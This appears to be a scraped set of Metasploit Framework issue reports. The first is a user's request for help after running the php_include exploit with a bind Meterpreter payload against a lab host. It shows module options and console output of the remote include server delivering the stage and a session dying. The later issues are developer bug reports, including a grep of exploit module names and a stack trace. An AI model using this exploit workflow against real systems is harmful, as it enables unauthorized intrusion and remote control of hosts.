URIPATH no The URI to use for this exploit (default is random)

VHOST no HTTP server virtual host
Payload options (php/meterpreter/bind_tcp):
Name Current Setting Required Description

LPORT 80 yes The listen port

RHOST 192.168.245.130 no The target address
Exploit target:
Id Name

0 Automatic
msf exploit(php_include) >

# the result is

msf exploit(php_include) > exploit

[] Started bind handler
[] Using URL: http://0.0.0.0:8080/TUit3E6Uxxs
[] Sending stage (39217 bytes) to 192.168.245.130
[] Local IP: http://192.168.245.128:8080/TUit3E6Uxxs
[] PHP include server started.
[] 192.168.245.130 - Meterpreter session 3 closed. Reason: Died
[*] Meterpreter session 3 opened (127.0.0.1 -> 192.168.245.130:80) at 2012-09-20 09:58:24 +0800
[-] Failed to load extension: No response was received to the core_loadlib request.

[-] Invalid session id

msf exploit(php_include) > sessions

I googled the error, it said some heart beat machnism, I do not understand !

can someone solve the problem ?

test

POSIX Meterpreter fails to return ouput from spawned processes

>> p = client.sys.process.execute("id", "-u", "Channelized"=>true); nil
=> nil
>> p.channel.read
=> nil

ExitFunction does not exist, should be EXITFUNC

$ grep ExitFunction modules/exploits/ -r
modules/exploits/linux/http/vcms_upload.rb:                                     'ExitFunction' => "none"
modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb:                                        'ExitFunction'         => "seh",
modules/exploits/windows/scada/iconics_genbroker.rb:                                    'ExitFunction' => "thread",
modules/exploits/windows/scada/factorylink_csservice.rb:                                        'ExitFunction' => "process",
modules/exploits/windows/scada/igss9_igssdataserver_rename.rb:                                  'ExitFunction' => "seh",
modules/exploits/windows/scada/procyon_core_server.rb:                                  'ExitFunction' => 'process',
modules/exploits/windows/scada/igss9_misc.rb:                                   'ExitFunction' => "none",
modules/exploits/windows/scada/igss9_igssdataserver_listall.rb:                                 'ExitFunction' => 'process',
modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb:                                 'ExitFunction' => "seh",
modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb:                                       'ExitFunction' => "seh",
modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb:                                        'ExitFunction' => "seh",
modules/exploits/windows/http/hp_power_manager_filename.rb:                                     'ExitFunction' => 'thread',
modules/exploits/windows/http/solarwinds_storage_manager_sql.rb:                                        'ExitFunction' => "none"
modules/exploits/windows/http/netdecision_http_bof.rb:                                  'ExitFunction' => "seh",
modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb:                                        'ExitFunction' => "seh",
modules/exploits/windows/ftp/ricoh_dl_bof.rb:                                   'ExitFunction' => "process",
modules/exploits/windows/misc/wireshark_lua.rb:                                 'ExitFunction' => "none"
modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb:                                       'ExitFunction' => 'process',
modules/exploits/windows/misc/splayer_content_type.rb:                                  'ExitFunction'         => "seh",
modules/exploits/windows/misc/hp_omniinet_4.rb:                                 'ExitFunction' => "process",
modules/exploits/windows/browser/asus_net4switch_ipswcom.rb:                                    'ExitFunction'         => "seh",
modules/exploits/windows/browser/vlc_mms_bof.rb:                                        'ExitFunction' => "process",
modules/exploits/windows/browser/adobe_flash_sps.rb:                                    'ExitFunction'         => "seh",
modules/exploits/windows/browser/mcafee_mvt_exec.rb:                                    'ExitFunction'         => "none",
modules/exploits/windows/browser/realplayer_qcp.rb:                                     'ExitFunction' => "process",
modules/exploits/windows/browser/vlc_amv.rb:                                    'ExitFunction' => "process",
modules/exploits/windows/browser/dell_webcam_crazytalk.rb:                                      'ExitFunction'         => "seh",
modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb:                                     'ExitFunction'         => "none",
modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb:                                 'ExitFunction'         => "seh",
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb:                                 'ExitFunction'         => "process",
modules/exploits/windows/browser/mozilla_reduceright.rb:                                        'ExitFunction' => "process",
modules/exploits/windows/ssh/sysax_ssh_username.rb:                                     'ExitFunction' => "seh"
modules/exploits/windows/fileformat/netop.rb:                                   'ExitFunction' => 'process',
modules/exploits/windows/fileformat/bsplayer_m3u.rb:                                    'ExitFunction' => 'process',
modules/exploits/windows/fileformat/mcafee_showreport_exec.rb:                                  'ExitFunction' => "none",
modules/exploits/windows/fileformat/gsm_sim.rb:                                 'ExitFunction' => 'process',
modules/exploits/windows/fileformat/dvdx_plf_bof.rb:                                    'ExitFunction' => "seh",  #none/process/seh
modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb:                                  'ExitFunction'          => 'process',
modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb:                                        'ExitFunction'          => "process",
modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb:                                      'ExitFunction' => "seh",
modules/exploits/windows/fileformat/aviosoft_plf_buf.rb:                                        'ExitFunction' => "seh",
modules/exploits/windows/fileformat/aol_desktop_linktag.rb:                                     'ExitFunction' => "process",
modules/exploits/windows/lotus/domino_icalendar_organizer.rb:                                   'ExitFunction' => "process",
modules/exploits/osx/browser/safari_file_policy.rb:                                     'ExitFunction' => "none",

FileDropper makes linux meterpreter to fail

Linux meterpreter sessions can fail due to this line I think

https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/file_dropper.rb#L25

session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)

See #1369 for the problem found while developing an exploit

'sysinfo' fails on java meterpreter

java meterpreter running on an ARM box:

ui:

meterpreter > sysinfo
[-] stdapi_sys_config_sysinfo: Operation failed: 1

log:

^[b[07/19/2012 10:25:43] [e(0)] meterpreter: stdapi_sys_config_sysinfo: Operation failed: 1
[07/19/2012 10:25:43] [d(0)] meterpreter: Call stack:
metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb:42:in `sysinfo'
metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:577:in `cmd_sysinfo'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:420:in `run_command'
metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:104:in `run_command'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:382:in `block in run_single'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `each'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `run_single'
metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'
metasploit-framework/lib/rex/ui/text/shell.rb:190:in `call'
metasploit-framework/lib/rex/ui/text/shell.rb:190:in `run'
metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'
metasploit-framework/lib/msf/base/sessions/meterpreter.rb:431:in `_interact'
metasploit-framework/lib/rex/ui/interactive.rb:49:in `interact'
metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1595:in `cmd_sessions'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:420:in `run_command'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:382:in `block in run_single'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `each'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `run_single'
metasploit-framework/lib/rex/ui/text/shell.rb:200:in `run'
./msfconsole:143:in `<main>'